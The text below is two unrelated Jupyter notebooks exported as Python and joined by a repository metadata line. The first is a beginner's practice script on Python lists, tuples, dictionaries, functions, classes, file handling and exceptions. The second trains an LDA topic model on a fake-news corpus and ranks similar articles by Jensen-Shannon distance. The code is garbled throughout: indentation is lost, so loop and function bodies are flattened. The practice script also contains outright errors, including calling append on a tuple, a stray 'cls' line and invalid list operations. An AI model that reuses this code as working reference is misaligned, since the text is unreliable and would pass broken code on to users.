s={1,2,3,1,2,3,4,5,6,7,8,}
s
print(s) # only give unique values no duplicates
# +
# tuple
# Tuples is just like a list with some diffrences
# List values is placed in square brackets but tuple values is placed in round brackets
tup = ("muz","smh", "arc", "dec", "wes", "ces", "scb", "sbp",)
print (tup)
tup.append("car")
# -
print(tup[:3]) ;print(tup[4:7]) ; tup_Dup = tup[4:7]; print (tup_Dup);print(tup.count("dec"));print(tup.index("dec"))
for elements in tup:
print (elements)
if elements == "ces": break
# +
L1 = ["a","b"]
L2 = [1,2,3,4,5]
for dat1 in L1:
for dat2 in L2:
print (dat1+"_"+str(dat2),end=",")
# -
print (L1)
L1= ["hasan syed","muzammil hasan","farooq Mohammad"]
print(L1)
# +
L2=L1 ;print (L2); L2.insert(41,"hasan1");print(L1);print(L2)
# -
print (L1)
L2=L1.copy() # making a copy
print (L2)
L2.clear()
print (L2)
L2.append("syed") ;print (L1); print(L2) # No impact on the original list
L1.remove("hasan")
print(L1)
input2 = input("Enter your name: ")
input2.lower() # it does not need to be placed in a variable
L1[0].lower()
L1[0].title()
L1[0].upper()
L1[1].lower()
L1[2].swapcase()
L1[2].capitalize()
L1[2].title()
print('hasan '*3)
# print even numbers only
for i in range(0,100,2):
print (i,end=",")
cls
for i in range (1,10):
print(i*"*")
list1=range(0,10,2); print(list1);list2 = list();print(list2)
list1=list(range(0,10,2)); print(list1);print(list1[0]);print(list1[-1]);print(max(list1));print(list1[:-2])
print(list("hello")); print(len(list("hello")));print(max(list("hello")))
# +
import random
print(random.shuffle(["hi","gt","ty"]))
# -
for i in list1:
print(i,end=",")
for i in range (0,10):
if i==5:
break
else:
print("The loop run fine completely")
print("the loop broke")
for i in range (0,10):
if i==11:
break
else:
print("The loop run fine completely")
for i in range (10):
if i!=5:
break
else:
print (i)
else:
print ("here")
print("here i am")
x= (x for x in range(3))
for i in x:
print(i)
print(type(x))
sentence = "my name is muzammil"
print(sentence)
for i in sentence.split():
print(i)
a=[0,1,2,3]
i=-2
for i in a:
print (i)
i+=1
a={}
a[2] ="hi"
a[1] =[1,2,3,]
print(a[1][1])
print(a)
a={1:"A",2:"B"}
b={3:"C",4:"D"}
a.update(b)
print(a)
a.clear()
print(a)
for i in range(len(list1)): print(list1[i])
for i in range(-2,len(list1),2):
print(list1[i])
st= "string"
print(st[0]) # string is also a list
st[4]
l1= [2, 33, 222, 14, 25] ; print(l1[-1]); print(l1[:-4]);print(l1[2:5]);print(l1[:]);print(l1*2)
print([0.5 *x for x in range(0,4)])
names1 = ['Amir', 'Bear', 'Charlton Hudston', 'Daman']
names2 = names1
names2[1]="Bear1"
print(names1)
print([11,222,25]<[11,2,25])
print(names1[2].title())
print(names1[2].capitalize())
names1 = ['Amir', 'Bear', 'Charlton', 'Daman']
names2 = names1[:]
names2[1]="Bear1"
print(names1)
numbers = [1, 2, 3, 4]
numbers.append([5,6,7,8])
print(len(numbers))
print(numbers)
list1 = [1, 2, 3, 4]
list2 = [5, 6, 7, 8]
print(len(list1 + list2))
print(list1 + list2)
# +
a=[1,2,3]
b=a.append(4)
print(a)
print(b)
b=a
print(a)
print(b)
b=a.copy()
print(a)
print(b)
b is a
# -
a=[13,56,17]
a.append([87])
a.extend([45,67])
print(a)
a=list((45,)*4)
print((45)*4); print(45*4);print("hi"*4)
print(a)
word1="Apple"
word2="Apple"
list1=[1,2,3]
list2=[1,2,3]
print(word1 is word2)
print(list1 is list2)
# +
names1 = ['Amir', 'Bear', 'Charlton', 'Daman']
names2 = names1
names3 = names1[:]
names2[0] = 'Alice'
names3[1] = 'Bob'
sum1 = 0
for ls in (names1, names2, names3) :
if ls[0] == 'Alice':
sum1 += 1
if ls[1] == 'Bob':
sum1 += 10
print(sum1)
# +
w="hello"
v=('a', 'e', 'i', 'o', 'u')
l1=[x for x in w if x in v]
print(l1)
# -
names = ['Amir', 'Bear', 'Charlton', 'Daman']
print(names[-1][-1])
t=32.00
print([round((x-32)*5/9) for x in t])
[(x**2) for x in range(0, 13)] # list comprehension
[x for x in range(0, 20) if (x%2==0)]
print([i for i in range(1, 101) if int(i*0.5)==(i*0.5)])
# [j for i in range(2,8) for j in range(i*2, 50, i)]
print("hi")
print(2**4);print([(x**2) for x in range(1, 13)])
print ("muzammil")
list1 = [1,2,3,4,5,6,7,8]
list2 = ["a","b","c"]
print (list1)
print (list2)
for l1 in list1:
for l2 in list2:
print (str(l1)+l2,end="")
# +
# Dictionary is just like an advance form of list. In list every value has an index Number but in Dictionary there is a
# Key-value pair
dict1 = {
"name": "muzammil",
"rank" : 4,
0: "zero",
"ID":420.558,
58:"its a code",
68.2: "its another code"
}
print (dict1)
# -
list1
dict1
rank1 = dict1["rank"]
print(rank1)
print (dict1[68.2]);print (dict1[58])
dict2 = dict1
name = dict2["name"]; print (name)
dict2["name"]="hasan"
print (dict1); print(dict2)
dict4={}
dict4["name"]="Syed"
dict4[0]="Waqar"
dict4[1]="Mujtaba"
dict4[2]="Muzammil"
dict4
del dict4[0]
dict4
dict4[1]="Mujtaba Hasan"
dict4
for i in dict4:
print (i)
for i in dict4.values():
print (i)
dict4.keys()
dict4.values()
for K, V in dict4.items():
print (str(K)+" : "+str(V))
for K, V in dict4.items():
print (str(K)," : ",str(V))
dict3=dict1
dict3
dict3 ={"ggg":42342242}
dict3
name = dict1["name"]
print(name)
dict1
dict1[254]="Hasan"
dict1
dict1[254]="waqar"
dict1
dict1[254]="waqar"
dict1
dict1["tttt"]="shhhhhh"
dict1
del dict1["tttt"]
dict1
l1=[]
for i in range (0,5):
l1.append(dict1)
print(l1)
l1[0]
l1[6][254]="dfasdfsfasfs"
l1[1]["name"]="hasan"
l1[1]
l1[6]["muzammil1"]="yyyyyyyy"
l1[6]
l1[7]=l1[6]
print(l1)
l1.append(dict1)
print(l1)
l1.append(dict4)
print(l1)
dict5={}
for i in range(0,4):
dict5[i]=dict4
del dict5[2]
print(dict5)
l1=[1,"hasan","syed",4,5,2.5,True,"Muzammil"]
l1
dict6={}
for i in range(2,6,1):
dict6[i-6]=l1
print(dict6)
print(len(dict6))
def addNames():
firstName="Syed"
lastName="Hasan"
print(firstName+lastName)
addNames()
def addNames(firstName,lastName):
print(firstName+lastName)
addNames ("Muzammil","HAsan") # positional arguments
addNames(firstName="Muzammil",lastName="Hasan") # keyword arguments
addNames(lastName="Hasan",firstName="Muzammil") # keyword arguments
def addNames(firstName,lastName,middleName=" S"): # optional arguments
print(firstName+lastName+middleName)
addNames("muzammil"," hasan"," Syed");addNames("muzammil"," hasan")
def calPercent(marksObtained,totalMarks=100):
print(marksObtained/totalMarks)
calPercent(75)
def calPercent(marksObtained, totalMarks=100 ,*otherInfo): # unknown number of arguments passed as a tuple
print(otherInfo)
print(marksObtained/totalMarks)
calPercent(85,100,"Muzammil is Passed")
def calPercent(marksObtained, totalMarks=100 ,**otherInfo): # unknown number of arguments passed as a dictionary
print(marksObtained/totalMarks)
print(otherInfo)
calPercent(85,100,Name="Muzammil",status="passed", school="la Canadiana")
# +
x=50
def funct():
# global x
x=2
print(x)
funct()
print(x)
# -
x=[1,2,3,4]
def l1(x):
x=x+[6,7]
print(x)
l1(x)
print(x)
def foo():
total=1
total+=1
return total
foo()
x=[1,2,3,4,1]
print(x)
x={1,2,3,4,1}
print(x)
# +
def adding(a=4,b=4):
print(a+b)
a=int(input("enter a"))
b=int(input("enter b"))
if a<0 and b<0:
adding()
else:
adding(a,b)
# +
def adding(a=4,b=4):
list1=[]
for i in range(a,b+1):
list1.append(i)
return list1
a=int(input("enter a"))
b=int(input("enter b"))
print(adding())
print(adding(a,b))
# +
def max(a=4,b=4):
if a>b :
print("maximum number is",a,"Minimum number is",b,sep="\t")
a=int(input("enter a"))
b=int(input("enter b"))
max(a,b)
# +
def sum(list):
total=0
for i in list:
total+=int(i)
return total
a = input ("Enter series of numbers to be add")
t=sum (a)
print(t)
print(sum((1,2,3,4,5)))
# +
def describe_pet(animal_type, pet_name="Sam"):
"""Display information about a pet."""
print("\nI have a " + animal_type + ".")
print("My " + animal_type + "'s name is " + pet_name.title() + ".")
describe_pet ("dog","harry")
describe_pet (pet_name="harry",animal_type="dog")
describe_pet ("dog")
describe_pet (pet_name="jami")
# +
def build_profile(first, last, **user_info):
# ""Build a dictionary containing everything we know about a user."""
profile = {}
profile['first_name'] = first
profile['last_name'] = last
for key, value in user_info.items():
profile[key] = value
return profile
user_profile = build_profile('albert', 'einstein',location='princeton',field='physics')
print(user_profile)
# +
keep_looping = True
w=0
while keep_looping == True:
print("value",w)
w+=1
if w==10:
keep_looping = False
else:
print ("I am out")
# -
keep_looping = True
w=0
while keep_looping == True:
print("value",w)
w+=1
if w==10:
# keep_looping = False
break
else:
print ("I am out")
# +
class Car():
color="green"
print(Car().color)
B= Car()
B.color= "blue"
print (B.color)
# +
class Car():
def __init__(self, doors, engine):
self.doors = doors
self.engine = engine
def describeCar(self):
print(f"{self.doors}"+" " +f"{self.engine}")
car1 = Car(4,2000)
car1.describeCar()
# +
class Red:
def feeling():
return "Lucky!"
r = Red()
print(r.feeling())
# +
class Red:
def feeling(self):
return "Lucky!"
r = Red()
print(r.feeling())
# +
class Horrible:
def bad_code(weird): # you can any varible instead of self
return "Don't write code like this"
h = Horrible()
print(h.bad_code())
# -
"Hello"[0]
# +
class patient():
def __init__(self, name, age):
self.name=name
self.age=age
def checkage(self):
if self.age < 18 :
print ("minor partient with age =",self.age)
else:
print ("not a minor partient with age =",self.age)
def changeage(self):
self.age=20
p1=patient("saad",12)
p1.changeage()
p1.checkage()
# +
greeting= '''
hello this is my
you are looking for
where are you
look for me
'''
with open("D:\PIAIC\Python_Hello_World\myfile.txt", "w") as f:
f.write("hello world this is my file")
f.write(greeting)
with open("D:\PIAIC\Python_Hello_World\myfile.txt", "r") as f:
filetext = f.read()
print(filetext)
# +
with open("D:\PIAIC\Python_Hello_World\myfile.txt", "a") as f:
f.write("\n \n this is the new appended text")
with open("D:\PIAIC\Python_Hello_World\myfile.txt") as f:
print(f.read())
# -
with open("D:\PIAIC\Python_Hello_World\myfile.txt") as f:
print(f.readline())
print(f.readlines())
# +
# working with csv files
import csv
with open("D:\PIAIC\Python_Hello_World\myfile.csv","w",newline="") as f:
data_handler= csv.writer(f,delimiter=",")
data_handler.writerow(["Name","father Name","age"])
data_handler.writerow(["Muzammil","Mamnoon","37"])
with open("D:\PIAIC\Python_Hello_World\myfile.csv","a",newline="") as f:
data_handler= csv.writer(f,delimiter=",")
data_handler.writerow(["Muddasssir","Mamnoon","33"])
data_handler.writerow(["Hina","Mamnoon","35"])
data=[]
with open("D:\PIAIC\Python_Hello_World\myfile.csv","r",) as f:
data_handler= csv.reader(f)
for each_line in data_handler:
data+=each_line
print (data)
# +
# You can't save a Python list in a text file. You can only save a text string.
# JavaScript Object Notation = json
import json
d1={
0:{"Name":"Hasan","father Name":"Mamnoon","age":37},
1:{"Name1":"Hasan1","father Name1":"Mamnoon1","age1":37},
3:[1,2,3,4,5]
}
with open("D:\PIAIC\Python_Hello_World\myfile.json","w",) as f:
json.dump(d1,f)
# with open("D:\PIAIC\Python_Hello_World\myfile.json","a",) as f:
# json.dump(dir1,f)
with open("D:\PIAIC\Python_Hello_World\myfile.json","r") as f:
data=json.load(f)
print(data)
# -
try:
print(5/0)
except ZeroDivisionError:
print ("print error")
# +
flag =1
while flag:
n1 , n2= input ("enter numbers to be divided : D/N ")
print(n1)
print(n2)
if int(n2)==0 :
flag=0
try:
print("division result :", int(n1)/int(n2))
except ZeroDivisionError:
print ("1. some error, you attempted to divide by zero")
except TypeError:
print ("1. some error, tye Error")
else:
print("2. ran smoothly")
finally:
print("3. this is fianlly block")
# -
n1 , n2= input ("enter numbers to be divided : D/N ")
try:
print("division result :", n1/int(n2))
except ZeroDivisionError:
print ("1. some error, you attempted to divide by zero")
# except TypeError:
# print ("1. some error, tye Error")
except FileNotFoundError:
print ("1. some error,File not found ")
except:
print ("1. some error,this catches everything ")
else:
print("2. ran smoothly")
finally:
print("3. this is fianlly block")
| 15,004 |
/lda_news.ipynb
|
4a5490c469de6789277ec9c3e52fc0aa8bd346d0
|
[] |
no_license
|
yingxiaoGuo/text_analysis
|
https://github.com/yingxiaoGuo/text_analysis
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 147,664 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # LDA and Document Similarity
#
# We are again working with the same fake news articles supplied by Kaggle.
#
# **I do not endorse and am not expressing any political affiliation or intent expressed in the articles in this dataset.**
#
# We will explain LDA and train an LDA model on this corpus of fake news to see what topics emerge.
#
# We will hold out some documents for testing to infer their topic distributions and compare them to the rest of the corpus to find the most similar documents.
#
# We use the [gensim](https://radimrehurek.com/gensim/models/ldamodel.html) package to do this, as it is highly optimised in C and has many features that make the implementation easy to use and very flexible.
# import dependencies
# %matplotlib inline
import pandas as pd
import numpy as np
import nltk
from nltk.corpus import stopwords
import gensim
from gensim.models import LdaModel
from gensim import models, corpora, similarities
import re
from nltk.stem.porter import PorterStemmer
import time
from nltk import FreqDist
from scipy.stats import entropy
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("darkgrid")
# Read in data; only keep essential columns and English language articles
df = pd.read_csv('fake.csv', usecols = ['uuid','author','title','text','language','site_url','country'])
df = df[df.language == 'english']
df = df[df['text'].map(type) == str]
df['title'].fillna(value="", inplace=True)
df.dropna(axis=0, inplace=True, subset=['text'])
# shuffle the data
df = df.sample(frac=1.0)
df.reset_index(drop=True,inplace=True)
df.head()
# Define some functions to clean and tokenize the data
# +
def initial_clean(text):
"""
Function to clean text of websites, email addresess and any punctuation
We also lower case the text
"""
text = re.sub("((\S+)?(http(s)?)(\S+))|((\S+)?(www)(\S+))|((\S+)?(\@)(\S+)?)", " ", text)
text = re.sub("[^a-zA-Z ]", "", text)
text = text.lower() # lower case the text
text = nltk.word_tokenize(text)
return text
stop_words = stopwords.words('english')
def remove_stop_words(text):
"""
Function that removes all stopwords from text
"""
return [word for word in text if word not in stop_words]
stemmer = PorterStemmer()
def stem_words(text):
"""
Function to stem words, so plural and singular are treated the same
"""
try:
text = [stemmer.stem(word) for word in text]
text = [word for word in text if len(word) > 1] # make sure we have no 1 letter words
except IndexError: # the word "oed" broke this, so needed try except
pass
return text
def apply_all(text):
"""
This function applies all the functions above into one
"""
return stem_words(remove_stop_words(initial_clean(text)))
# -
# clean text and title and create new column "tokenized"
t1 = time.time()
df['tokenized'] = df['text'].apply(apply_all) + df['title'].apply(apply_all)
t2 = time.time()
print("Time to clean and tokenize", len(df), "articles:", (t2-t1)/60, "min")
# ### Get word frequency
#
# We'll use nltk to get a word frequency (by count) here and only keep the top most used words to train the LDA model on
# first get a list of all words
all_words = [word for item in list(df['tokenized']) for word in item]
# use nltk fdist to get a frequency distribution of all words
fdist = FreqDist(all_words)
len(fdist) # number of unique words
# choose k and visually inspect the bottom 10 words of the top k
k = 50000
top_k_words = fdist.most_common(k)
top_k_words[-10:]
# choose k and visually inspect the bottom 10 words of the top k
k = 15000
top_k_words = fdist.most_common(k)
top_k_words[-10:]
# k = 50,000 is too high, as the bottom words aren't even real words and are very rarely used (once in entire corpus)
#
# k = 15,000 is much more reasonable as these have been used at least 13 times in the corpus
# define a function only to keep words in the top k words
top_k_words,_ = zip(*fdist.most_common(k))
top_k_words = set(top_k_words)
def keep_top_k_words(text):
return [word for word in text if word in top_k_words]
df['tokenized'] = df['tokenized'].apply(keep_top_k_words)
# +
# document length
df['doc_len'] = df['tokenized'].apply(lambda x: len(x))
doc_lengths = list(df['doc_len'])
df.drop(labels='doc_len', axis=1, inplace=True)
print("length of list:",len(doc_lengths),
"\naverage document length", np.average(doc_lengths),
"\nminimum document length", min(doc_lengths),
"\nmaximum document length", max(doc_lengths))
# -
# plot a histogram of document length
num_bins = 1000
fig, ax = plt.subplots(figsize=(12,6));
# the histogram of the data
n, bins, patches = ax.hist(doc_lengths, num_bins, normed=1)
ax.set_xlabel('Document Length (tokens)', fontsize=15)
ax.set_ylabel('Normed Frequency', fontsize=15)
ax.grid()
ax.set_xticks(np.logspace(start=np.log10(50),stop=np.log10(2000),num=8, base=10.0))
plt.xlim(0,2000)
ax.plot([np.average(doc_lengths) for i in np.linspace(0.0,0.0035,100)], np.linspace(0.0,0.0035,100), '-',
label='average doc length')
ax.legend()
ax.grid()
fig.tight_layout()
plt.show()
# We can see that, compared to our histogram in exploring_news notebook, the average document length is about half when all stop words are removed and only the top 15,000 words are used.
# ### Drop short articles
#
# LDA does not work very well on short documents, which we will explain later, so we will drop some of the shorter articles here before training the model.
#
# From the histogram above, droping all articles less than 40 tokens seems appropriate.
# only keep articles with more than 30 tokens, otherwise too short
df = df[df['tokenized'].map(len) >= 40]
# make sure all tokenized items are lists
df = df[df['tokenized'].map(type) == list]
df.reset_index(drop=True,inplace=True)
print("After cleaning and excluding short aticles, the dataframe now has:", len(df), "articles")
df.head()
# ### Split the corpus into training and testing
# Here we will split the corpus into training and testing sets.
#
# The training set will be used to train the LDA model on, while the testing set will be used to retrieve similar articles later in our recommendation algorithm.
#
# The dataframe is already shuffled from the begining, so no need to do it again.
# create a mask of binary values
msk = np.random.rand(len(df)) < 0.999
# +
train_df = df[msk]
train_df.reset_index(drop=True,inplace=True)
test_df = df[~msk]
test_df.reset_index(drop=True,inplace=True)
# -
print(len(df),len(train_df),len(test_df))
# # LDA
#
# Latent Dirichlet Allocation, is an unsupervised generative model that assigns topic distributions to documents.
#
# At a high level, the model assumes that each document will contain several topics, so that there is topic overlap within a document. The words in each document contribute to these topics. The topics may not be known a priori, and needn't even be specified, but the **number** of topics must be specified a priori. Finally, there can be words overlap between topics, so several topics may share the same words.
#
# The model generates to **latent** (hidden) variables
# 1) A distribution over topics for each document
# 2) A distribution over words for each topics
#
# After training, each document will have a discrete distribution over all topics, and each topic will have a discrete distribution over all words.
#
# It is best to demonstrate this with an example. Let's say a document about the presidential elections may have a high contribution from the topics "presidential elections", "america", "voting" but have very low contributions from topics "himalayan mountain range", "video games", "machine learning" (assuming the corpus is varied enough to contain such articles); the topics "presidential elections" may have top contributing words ["vote","election","people","usa","clinton","trump",...] whereas the top contributing words in the topic "himalayan mountain range" may be ["nepal","everest","china","altitude","river","snow",....]. This very rough example should give you an idea of what LDA aims to do.
#
# An important point to note: although I have named some topics in the example above, the model itself does not actually do any "naming" or classifying of topics. But by visually inspecting the top contributing words of a topic i.e. the discrete distribution over words for a topic, one can name the topics if necessary after training. We will show this more later.
#
# There a several ways to implement LDA, however I will speak about collapsed gibbs sampling as I usually find this to be the easiest way to understand it.
#
# The model initialises by assigning every word in every document to a **random** topic. Then, we iterate through each word, unassign it's current topic, decrement the topic count corpus wide and reassign the word to a new topic based on the local probability of topic assignemnts to the current document, and the global (corpus wide) probability of the word assignments to the current topic. This may be hard to understand in words, so the equations are below.
# ### The mathematics of collapsed gibbs sampling (cut back version)
#
# Recall that when we iterate through each word in each document, we unassign its current topic assignment and reassign the word to a new topic. The topic we reassign the word to is based on the probabilities below.
#
# $$
# P\left(\text{document "likes" the topic}\right) \times P\left(\text{topic "likes" the word } w'\right)
# $$
#
# $$
# \Rightarrow \frac{n_{i,k}+\alpha}{N_i-1+K\alpha} \times \frac{m_{w',k}+\gamma}{\sum_{w\in V}m_{w,k} + V\gamma}
# $$
#
# where
#
# $n_{i,k}$ - number of word assignments to topic $k$ in document $i$
#
# $n_{i,k}$ - number of assignments to topic $k$ in document $i$
#
# $\alpha$ - smoothing parameter (hyper parameter - make sure probability is never 0)
#
# $N_i$ - number of words in document $i$
#
# $-1$ - don't count the current word you're on
#
# $K$ - total number of topics
#
#
# $m_{w',k}$ - number of assignments, corpus wide, of word $w'$ to topic $k$
#
# $m_{w',k}$ - number of assignments, corpus wide, of word $w'$ to topic $k$
#
# $\gamma$ - smoothing parameter (hyper parameter - make sure probability is never 0)
#
# $\sum_{w\in V}m_{w,k}$ - sum over all words in vocabulary currently assigned to topic $k$
#
# $V$ size of vocabulary i.e. number of distinct words corpus wide
# ### Notes and Uses of LDA
#
# LDA has many uses; understanding the different varieties topics in a corpus (obviously), getting a better insight into the type of documents in a corpus (whether they are about news, wikipedia articles, business documents), quantifying the most used / most important words in a corpus, and even document similarity and recommendation.
#
# LDA does not work well with very short documents, like twitter feeds, as explained here [[1]](https://pdfs.semanticscholar.org/f499/5dc2a4eb901594578e3780a6f33dee02dad1.pdf) [[2]](https://stackoverflow.com/questions/29786985/whats-the-disadvantage-of-lda-for-short-texts), which is why we dropped articles under 40 tokens previously. Very briefly, this is because the model infers parameters from observations and if there are not enough observations (words) in a document, the model performs poorly. For short texts, although yet to be rigoursly tested, it may be best to use a [biterm model](https://pdfs.semanticscholar.org/f499/5dc2a4eb901594578e3780a6f33dee02dad1.pdf).
#
# Unlike the word2vec algorithm, which performs extremely well with full structured sentences, LDA is a bag of words model, meaning word order in a document doesnt count. This also means that stopwords and rare words should be excluded, so that the model doesnt overcompensate for very frequent words and very rare words, both of which do not contribute to general topics.
#
# #### Hyperparameters
#
# LDA has 2 hyperparameters: $\alpha$ and $\eta$
#
# $\alpha$ - A low value for $\alpha$ means that documents have only a low number of topics contributing to them. A high value of $\alpha$ yields the inverse, meaning the documents appear more alike within a corpus.
#
# $\eta$ - A low value for $\eta$ means the topics have a low number of contributing words. A high value of $\eta$ yields the inverse, meaning topics will have word overlap and appear more alike.
#
# The values of $\alpha$ and $\eta$ really depend on the application, and may need to be tweaked several times before the desired results are found... even then, LDA is non-deterministic since parameters are randomly initialised, so the outcome of any run of the model can never be known in advance.
def train_lda(data):
"""
This function trains the lda model
We setup parameters like number of topics, the chunksize to use in Hoffman method
We also do 2 passes of the data since this is a small dataset, so we want the distributions to stabilize
"""
num_topics = 100
chunksize = 300
dictionary = corpora.Dictionary(data['tokenized'])
corpus = [dictionary.doc2bow(doc) for doc in data['tokenized']]
t1 = time.time()
# low alpha means each document is only represented by a small number of topics, and vice versa
# low eta means each topic is only represented by a small number of words, and vice versa
lda = LdaModel(corpus=corpus, num_topics=num_topics, id2word=dictionary,
alpha=1e-2, eta=0.5e-2, chunksize=chunksize, minimum_probability=0.0, passes=2)
t2 = time.time()
print("Time to train LDA model on ", len(df), "articles: ", (t2-t1)/60, "min")
return dictionary,corpus,lda
dictionary,corpus,lda = train_lda(train_df)
# ### Let's inspect some topics!
#
# Bear in mind, when we see the words they may seem shortened. Recall this is because of our stemming function we previously implemented.
# show_topics method shows the the top num_words contributing to num_topics number of random topics
lda.show_topics(num_topics=10, num_words=20)
# #### We can inspect individual topics as such
#
# Note that if you re run the model again, as it is non-deterministic, word contributions to topics and topic ID's will change.
# #### This topic is about court cases
lda.show_topic(topicid=4, topn=20)
# #### This topic is about (supposedly) Illegal Immigration
lda.show_topic(topicid=85, topn=20)
# #### This topic is about Religion
lda.show_topic(topicid=75, topn=20)
# #### This topic is about Climate Change
lda.show_topic(topicid=39, topn=20)
# What the about above means, is that topic 4 has top contributing words ["judge","case","court",...], which indicates the topic is about court cases. Topic 75 has top contributing words ["god","christian","love",...], which indicates the topic is about religion.
#
# Now, not only can we see the word contribution for each topic, but we can also visualise the topic contribution for each article.
# select and article at random from train_df
random_article_index = np.random.randint(len(train_df))
bow = dictionary.doc2bow(train_df.iloc[random_article_index,7])
print(random_article_index)
print(train_df.iloc[random_article_index,3])
# get the topic contributions for the document chosen at random above
doc_distribution = np.array([tup[1] for tup in lda.get_document_topics(bow=bow)])
# bar plot of topic distribution for this document
fig, ax = plt.subplots(figsize=(12,6));
# the histogram of the data
patches = ax.bar(np.arange(len(doc_distribution)), doc_distribution)
ax.set_xlabel('Topic ID', fontsize=15)
ax.set_ylabel('Topic Contribution', fontsize=15)
ax.set_title("Topic Distribution for Article " + str(random_article_index), fontsize=20)
ax.set_xticks(np.linspace(10,100,10))
fig.tight_layout()
plt.show()
# Ok, so clearly this document has various contributions from different topics. But what are these topics? Lets find out!
# print the top 5 contributing topics and their words
for i in doc_distribution.argsort()[-5:][::-1]:
print(i, lda.show_topic(topicid=i, topn=10), "\n")
# Let's interpret this.
#
# Topic 9 - Protests
#
# Topic 72 - Middl Eastern Countries
#
# Topic 36 - Islam
#
# Topic 55 - Power (socio political sense)
#
# Topic 38 - Peoples actions
#
# These are rough interpretations for these topics, most of which make sense. Reading the article we see the it is about riots in the Middle East. So the model seems to have worked well, at least in this one case.
# # Similarity Queries and Unseen Data
#
# We will now turn our attention to the test set of data which the model has not yet seen. Although the articles in *test_df* have been unseen by the model, gensim has a way of infering their topic distributions given the trained model. Of course, the correct approach to yield accurate results would be to retrain the model with these new articles part of the corpus, but this can be timely and infeasable in a real case scenario where results are needed quickly.
#
# First, lets show how we can infer document topics for a new unseen article.
# select and article at random from test_df
random_article_index = np.random.randint(len(test_df))
print(random_article_index)
# Here's the important bit. In obtaining the BOW representation for this unseen article, gensim cleverly only considers words in the existing dictionary we used to train the model. So if there are new words in this article, they will not be considered when infering the topic distribution. This is good in that no errors arise for unseen words, but bad in that some words may be cut out, and therefore we could miss out on an accurate topic distribution for this article.
#
# However, we mitigate this risk because the training set is very much representative of the entire corpus; 99.9% of the observations are in the training set, with only 0.01% of observations in the test set. So most, if not all, words from the test set should be in the training set's dictionary.
new_bow = dictionary.doc2bow(test_df.iloc[random_article_index,7])
print(test_df.iloc[random_article_index,3])
new_doc_distribution = np.array([tup[1] for tup in lda.get_document_topics(bow=new_bow)])
# Let's do the same visual analysis as before on this new unseen document
# bar plot of topic distribution for this document
fig, ax = plt.subplots(figsize=(12,6));
# the histogram of the data
patches = ax.bar(np.arange(len(new_doc_distribution)), new_doc_distribution)
ax.set_xlabel('Topic ID', fontsize=15)
ax.set_ylabel('Topic Contribution', fontsize=15)
ax.set_title("Topic Distribution for an Unseen Article", fontsize=20)
ax.set_xticks(np.linspace(10,100,10))
fig.tight_layout()
plt.show()
# print the top 8 contributing topics and their words
for i in new_doc_distribution.argsort()[-5:][::-1]:
print(i, lda.show_topic(topicid=i, topn=10), "\n")
# And there we have it! An accurate topic distribution for an unseen document.
# ### Similarity query
#
# Ok, now that we have a topic distribution for a new unseen document, let's say we wanted to find the most similar documents in the corpus. We can do this by comparing the topic distribution of the new document to all the topic distributions of the documents in the corpus. We use the [Jensen-Shannon distance](https://en.wikipedia.org/wiki/Jensen%E2%80%93Shannon_divergence) metric to find the most similar documents.
#
# What the Jensen-Shannon distance tells us, is which documents are statisically "closer" (and therefore more similar), by comparing the divergence of their distributions. Jensen-Shannon is symmetric, unlike Kullback-Leibler on which the formula is based. This is good, because we want the similarity between documents A and B to be the same as the similarity between B and A.
#
# The formula is described below.
#
# For discrete distirbutions $P$ and $Q$, the Jensen-Shannon divergence, $JSD$ is defined as
#
# $$JSD\left(P||Q\right) = \frac{1}{2}D\left(P||M\right)+\frac{1}{2}D\left(Q||M\right)$$
#
# where $M = \frac{1}{2}\left(P+Q\right)$
#
# and $D$ is the Kullback-Leibler divergence
#
# $$D\left(P||Q\right) = \sum_iP(i)\log\left(\frac{P(i)}{Q(i)}\right)$$
#
# $$\Rightarrow JSD\left(P||Q\right) = \frac{1}{2}\sum_i
# \left[
# P(i)\log\left(\frac{P(i)}{\frac{1}{2}\left(P(i)+Q(i)\right)}\right)
# +
# Q(i)\log\left(\frac{Q(i)}{\frac{1}{2}\left(P(i)+Q(i)\right)}\right)
# \right]$$
#
# The square root of the Jensen-Shannon divergence is the Jensen-Shannon Distance: $\sqrt{JSD\left ( P||Q\right )}$
#
# **The smaller the Jensen-Shannon Distance, the more similar two distributions are (and in our case, the more similar any 2 documents are)**
# We can use the scipy implementation of entropy to do this. Entropy calculates the KL divergence.
#
# But first, we need to get all our LDA topic distributions into a dense matrix. This will enable fast and efficient computation.
#
# We will create a dense matrix, **doc_topic_dist**, of size $M\times K$ where $M$ is the number of documents and $K$ is the number of topics.
# we need to use nested list comprehension here
# this may take 1-2 minutes...
doc_topic_dist = np.array([[tup[1] for tup in lst] for lst in lda[corpus]])
doc_topic_dist.shape
def jensen_shannon(query, matrix):
"""
This function implements a Jensen-Shannon similarity
between the input query (an LDA topic distribution for a document)
and the entire corpus of topic distributions.
It returns an array of length M where M is the number of documents in the corpus
"""
# lets keep with the p,q notation above
p = query[None,:].T # take transpose
q = matrix.T # transpose matrix
m = 0.5*(p + q)
return np.sqrt(0.5*(entropy(p,m) + entropy(q,m)))
# Let's compare the new unseen document, to the corpus, and see which articles are most similar.
def get_most_similar_documents(query,matrix,k=10):
"""
This function implements the Jensen-Shannon distance above
and retruns the top k indices of the smallest jensen shannon distances
"""
sims = jensen_shannon(query,matrix) # list of jensen shannon distances
return sims.argsort()[:k] # the top k positional index of the smallest Jensen Shannon distances
# #### Query time + most similar documents... at last!
#
# Ok, let's be 100% clear about what we are doing here.
#
# We are comparing the new unseen document above to the entire corpus of ~10k documents to find which one is most similar to the new document.
#
# How are we doing that? Well, we have the new documents LDA topic distribution in stored as varibale **new_doc_distribution**, and we have the entire corpus of documents topic distributions stored in the dense matrix **doc_topic_dist**. So now, we pass each row of **doc_topic_dist** through the Jensen-Shannon function above as the Q distribution, while the P distribution remains static as **new_doc_distribution**. Then we get the smallest distances and their corresponding index in the array, which we can pass to the **train_df** dataframe to print out the most similar documents.
# this is surprisingly fast
most_sim_ids = get_most_similar_documents(new_doc_distribution,doc_topic_dist)
most_similar_df = train_df[train_df.index.isin(most_sim_ids)]
most_similar_df['title']
# I think we can see, the top most similar articles are quite similar indeed to the query article ;)
#
